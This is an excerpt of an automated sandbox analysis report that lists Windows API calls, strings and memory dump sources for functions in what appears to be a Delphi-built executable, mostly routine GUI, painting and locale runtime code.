Part of subcall function 00455610: GetCurrentThreadId.KERNEL32 ref: 00455628
Part of subcall function 00455610: SetWindowsHookExA.USER32(00000003,004555CC,00000000,00000000), ref: 00455638
Part of subcall function 00455610: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00455653
Part of subcall function 00455610: CreateThread.KERNEL32(00000000,000003E8,00455570,00000000,00000000), ref: 00455677

Part of subcall function 00457718: SetTimer.USER32(00000000,00000000,?,0045551C), ref: 00457732

Part of subcall function 0044DF58: GetActiveWindow.USER32 ref: 0044DF5B
Part of subcall function 0044DF58: GetCurrentThreadId.KERNEL32(0044DF38), ref: 0044DF70
Part of subcall function 0044DF58: EnumThreadWindows.USER32(00000000,0044DF38), ref: 0044DF76

Part of subcall function 00457948: GetCursor.USER32 ref: 00457963
Part of subcall function 00457948: GetIconInfo.USER32(00000000,?), ref: 00457969

Strings

41C, xrefs: 00457C05
|7C, xrefs: 00457CA5

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0043A714, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 117

APIs

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

GetClassInfoA.USER32(?,?,?), ref: 0043A7D8
UnregisterClassA.USER32(?,?), ref: 0043A800
RegisterClassA.USER32(?), ref: 0043A816

Part of subcall function 0043D99C: IsIconic.USER32(?), ref: 0043D9AB
Part of subcall function 0043D99C: GetWindowPlacement.USER32(?,0000002C), ref: 0043D9C8
Part of subcall function 0043D99C: GetWindowRect.USER32(?), ref: 0043D9E1
Part of subcall function 0043D99C: GetWindowLongA.USER32(?,000000F0), ref: 0043D9EF
Part of subcall function 0043D99C: GetWindowLongA.USER32(?,000000F8), ref: 0043DA04
Part of subcall function 0043D99C: ScreenToClient.USER32(00000000), ref: 0043DA11
Part of subcall function 0043D99C: ScreenToClient.USER32(00000000,?), ref: 0043DA1C

Part of subcall function 0041EAB0: CreateFontIndirectA.GDI32(?), ref: 0041EBEE

Part of subcall function 0040B04C: GetLastError.KERNEL32(00000000,0040B0DC), ref: 0040B066

Strings

41C, xrefs: 0043A765
@, xrefs: 0043A74D

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0040A328, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107

APIs

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A4E3), ref: 0040A393
GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A4E3), ref: 0040A3B5

Strings

4s@, xrefs: 0040A494
t|@, xrefs: 0040A44A, 0040A4A6
s@, xrefs: 0040A438

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00409CD8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409CF5
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409D19
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409D34
LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 00409DCA

Strings

Ts@, xrefs: 00409DB6

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00409CD6, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409CF5
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409D19
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409D34
LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 00409DCA

Strings

Ts@, xrefs: 00409DB6

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00403340, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403362
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004033B1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403395
RegCloseKey.ADVAPI32(?,004033B8,00000000,?,00000004,00000000,004033B1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004033AB

Strings

FPUMaskValue, xrefs: 0040338C
SOFTWARE\Borland\Delphi\RTL, xrefs: 00403358

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0044FD30, Relevance: 7.7, APIs: 5, Instructions: 171

APIs

MulDiv.KERNEL32(00000000,?,00000000), ref: 0044FDEF
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044FE6B
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044FE9A
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044FEC9
MulDiv.KERNEL32(?,00000000,00000000,?), ref: 0044FEEC

Part of subcall function 0044F298: MulDiv.KERNEL32(?,00000001,00000001), ref: 0044F2F5
Part of subcall function 0044F298: MulDiv.KERNEL32(?,00000001,00000001), ref: 0044F315

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004470F8, Relevance: 7.7, APIs: 5, Instructions: 162

APIs

DrawEdge.USER32(00000000,?,00000006,00000002), ref: 004471C7
OffsetRect.USER32(?,00000001,00000001), ref: 00447218
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044724D
OffsetRect.USER32(?,000000FF,000000FF), ref: 0044725A

Part of subcall function 0041E5DC: GetSysColor.USER32(?), ref: 0041E5E6

DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 004472C1

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0042A40C, Relevance: 7.6, APIs: 5, Instructions: 110

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 0042A4A6
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A4DE
OffsetRect.USER32(?,000000FF,000000FF), ref: 0042A4E8
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A520
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A547

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0043B3DC, Relevance: 7.6, APIs: 5, Instructions: 104

APIs

BeginPaint.USER32(00000000,?), ref: 0043B402
SaveDC.GDI32(?), ref: 0043B436
ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0043B498
RestoreDC.GDI32(?,?), ref: 0043B4C2

Part of subcall function 0043B538: RectVisible.GDI32(?,?), ref: 0043B5F1
Part of subcall function 0043B538: SaveDC.GDI32(?), ref: 0043B607
Part of subcall function 0043B538: IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043B62A
Part of subcall function 0043B538: RestoreDC.GDI32(?,?), ref: 0043B645
Part of subcall function 0043B538: CreateSolidBrush.GDI32(00000000), ref: 0043B6C6
Part of subcall function 0043B538: FrameRect.USER32(?,?,?), ref: 0043B6F9
Part of subcall function 0043B538: DeleteObject.GDI32(?), ref: 0043B703
Part of subcall function 0043B538: CreateSolidBrush.GDI32(00000000), ref: 0043B713
Part of subcall function 0043B538: FrameRect.USER32(?,00000000,?), ref: 0043B746
Part of subcall function 0043B538: DeleteObject.GDI32(?), ref: 0043B750

EndPaint.USER32(00000000,?), ref: 0043B4F6

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004593E0, Relevance: 7.6, APIs: 5, Instructions: 86

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 00459416
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0045944A
OffsetRect.USER32(?,000000FF,000000FF), ref: 00459457
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00459489
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 004594B0

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00446F38, Relevance: 7.6, APIs: 5, Instructions: 77

APIs

Part of subcall function 00447068: CreatePopupMenu.USER32(?,00446D7B,00000000,00000000,00446DBF), ref: 00447083
Part of subcall function 00447068: CreateMenu.USER32 ref: 0044708D

GetMenuItemCount.USER32(00000000), ref: 00446F70
GetMenuState.USER32(00000000,-00000001,00000400), ref: 00446F91
RemoveMenu.USER32(00000000,-00000001,00000400), ref: 00446FA8
GetMenuItemCount.USER32(00000000), ref: 00446FD8
DestroyMenu.USER32(00000000), ref: 00446FE5

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00456928, Relevance: 7.6, APIs: 5, Instructions: 73

APIs

GetCapture.USER32(?,?,0045BD1C,00000001,00456AEB,?,?,?,0045BD1C), ref: 0045694B
GetParent.USER32(00000000), ref: 00456971

Part of subcall function 00433EA4: GlobalFindAtomA.KERNEL32(00000000), ref: 00433EB8
Part of subcall function 00433EA4: GetPropA.USER32(00000000,00000000), ref: 00433ECF

SendMessageA.USER32(00000000,-0000BBEE,0045BD1C,?), ref: 0045699F
GetWindowLongA.USER32(00000000,000000FA), ref: 004569AF
SendMessageA.USER32(00000000,-0000BBEE,0045BD1C,?), ref: 004569CE

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00424420, Relevance: 7.6, APIs: 5, Instructions: 66

APIs

Part of subcall function 00420530: CreateCompatibleDC.GDI32(00000000), ref: 00420549
Part of subcall function 00420530: SelectObject.GDI32(00000000,00000000), ref: 00420552
Part of subcall function 00420530: GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 00420566
Part of subcall function 00420530: SelectObject.GDI32(00000000,00000000), ref: 00420572
Part of subcall function 00420530: DeleteDC.GDI32(00000000), ref: 00420578
Part of subcall function 00420530: CreatePalette.GDI32 ref: 004205BE

GetDC.USER32(00000000), ref: 00424476
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042448B
GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424495
CreateHalftonePalette.GDI32(00000000), ref: 004244B9
ReleaseDC.USER32(00000000,00000000), ref: 004244C4

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00454084, Relevance: 7.6, APIs: 5, Instructions: 63

APIs

GetWindowLongA.USER32(00000000,000000EC), ref: 004540B8
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 004540EA
SetLayeredWindowAttributes.USER32(00000000,?,?,00000000), ref: 00454124
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 0045413D
RedrawWindow.USER32(00000000,00000000,00000000,00000485), ref: 00454153

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0041C8EC, Relevance: 7.6, APIs: 5, Instructions: 60

APIs

GetClassInfoA.USER32(00400000,0041C8DC,?), ref: 0041C90D
UnregisterClassA.USER32(0041C8DC,00400000), ref: 0041C936
RegisterClassA.USER32(0045C4C0), ref: 0041C940
CreateWindowExA.USER32(00000080,0041C8DC,0041C99C,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0041C96E

Part of subcall function 0041C830: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C84E

SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041C98B

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00420498, Relevance: 7.6, APIs: 5, Instructions: 55

APIs

GetDC.USER32(00000000), ref: 004204B0
GetDeviceCaps.GDI32(?,00000068), ref: 004204CC
GetPaletteEntries.GDI32(0B080891,00000000,00000008,?), ref: 004204E4
GetPaletteEntries.GDI32(0B080891,00000008,00000008,?), ref: 004204FC
ReleaseDC.USER32(00000000,?), ref: 00420518

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004099F4, Relevance: 7.6, APIs: 5, Instructions: 50

APIs

GetThreadLocale.KERNEL32(?,00000000,00409A8B,?,?,00000000), ref: 00409A0C

Part of subcall function 0040976C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040978A

GetThreadLocale.KERNEL32(00000000,00000004,00000000,00409A8B,?,?,00000000), ref: 00409A3C
EnumCalendarInfoA.KERNEL32(Function_00009940,00000000,00000000,00000004), ref: 00409A47
GetThreadLocale.KERNEL32(00000000,00000003,00000000,00409A8B,?,?,00000000), ref: 00409A65
EnumCalendarInfoA.KERNEL32(Function_0000997C,00000000,00000000,00000003), ref: 00409A70

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00455684, Relevance: 7.5, APIs: 5, Instructions: 25

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 00455693
SetEvent.KERNEL32(00000000,0045792E,00000000,00456A0B,?,?,0045BD1C,00000001,00456ACB,?,?,?,0045BD1C), ref: 004556AE
GetCurrentThreadId.KERNEL32(00000000,0045792E,00000000,00456A0B,?,?,0045BD1C,00000001,00456ACB,?,?,?,0045BD1C), ref: 004556B3
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004556C8
CloseHandle.KERNEL32(00000000), ref: 004556D3

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0044197C, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 287

APIs

Part of subcall function 00441460: SelectObject.GDI32(?,00000000), ref: 0044150C
Part of subcall function 00441460: PatBlt.GDI32(?,?,?,?,?,005A0049,?,00000000), ref: 00441534
Part of subcall function 00441460: SelectObject.GDI32(?,00000000), ref: 0044153E

Part of subcall function 00437C84: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00437CE1
Part of subcall function 00437C84: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00437DE3
Part of subcall function 00437C84: MapWindowPoints.USER32(00000000,00000000,?,00000001), ref: 00437E1F

PeekMessageA.USER32(?,00000000,00000203,00000203,00000000), ref: 00441AF8

Part of subcall function 0043762C: GetCursorPos.USER32 ref: 00437690

Part of subcall function 0044134C: GetDCEx.USER32(00000000,00000000,00000412), ref: 00441387

Part of subcall function 004413AC: ReleaseDC.USER32(?,?), ref: 004413CA

GetCursorPos.USER32(?), ref: 00441BBC
SetCursor.USER32(00000000), ref: 00441C4E

Strings

41C, xrefs: 00441B04

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00425130, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 203

APIs

Part of subcall function 0042429C: GetObjectA.GDI32(?,00000054,?), ref: 004242C2

SelectObject.GDI32(?,?), ref: 0042522C
GetDIBColorTable.GDI32(?,00000000,00000100,?), ref: 0042524D
SelectObject.GDI32(?,?), ref: 00425262

Part of subcall function 004205D4: GetObjectA.GDI32(?,00000004), ref: 004205EB
Part of subcall function 004205D4: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 0042060E

Strings

BM, xrefs: 00425208

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 00409AA4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148

APIs

GetThreadLocale.KERNEL32(?,00000000,00409C6E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409AD3

Part of subcall function 0040976C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040978A

Strings

ggg, xrefs: 00409BB8
yyyy, xrefs: 00409BC5
eeee, xrefs: 00409BDE

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004352E0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144

APIs

GetWindowRect.USER32(00000000,-00000044), ref: 004353CC
GetCursorPos.USER32(?), ref: 004353F7

Part of subcall function 00435170: GetCursorPos.USER32(00464B90), ref: 00435191
Part of subcall function 00435170: GetCursor.USER32 ref: 004351AD
Part of subcall function 00435170: GetDesktopWindow.USER32 ref: 0043529F

Strings

41C, xrefs: 004353AE, 004353E4
8 C, xrefs: 00435392

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 0043D284, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83

APIs

IsWindowVisible.USER32(?), ref: 0043D29F
ScrollWindow.USER32(?,?,?,00000000,00000000), ref: 0043D2CE
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0043D344

Strings

41C, xrefs: 0043D2F1

Memory Dump Source

Source File: 00000007.00000001.190110108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.190103631.00400000.00000002.sdmp
Associated: 00000007.00000001.190122208.0045C000.00000004.sdmp
Associated: 00000007.00000001.190128665.0045D000.00000008.sdmp
Associated: 00000007.00000001.190135689.00464000.00000004.sdmp
Associated: 00000007.00000001.190141797.00466000.00000008.sdmp
Associated: 00000007.00000001.190148383.00468000.00000004.sdmp
Associated: 00000007.00000001.190155183.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_FB_390E.jbxd

Function 004573BC, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80

APIs

Part of subcall function 00457338: GetCursorPos.USER32 ref: 00457341

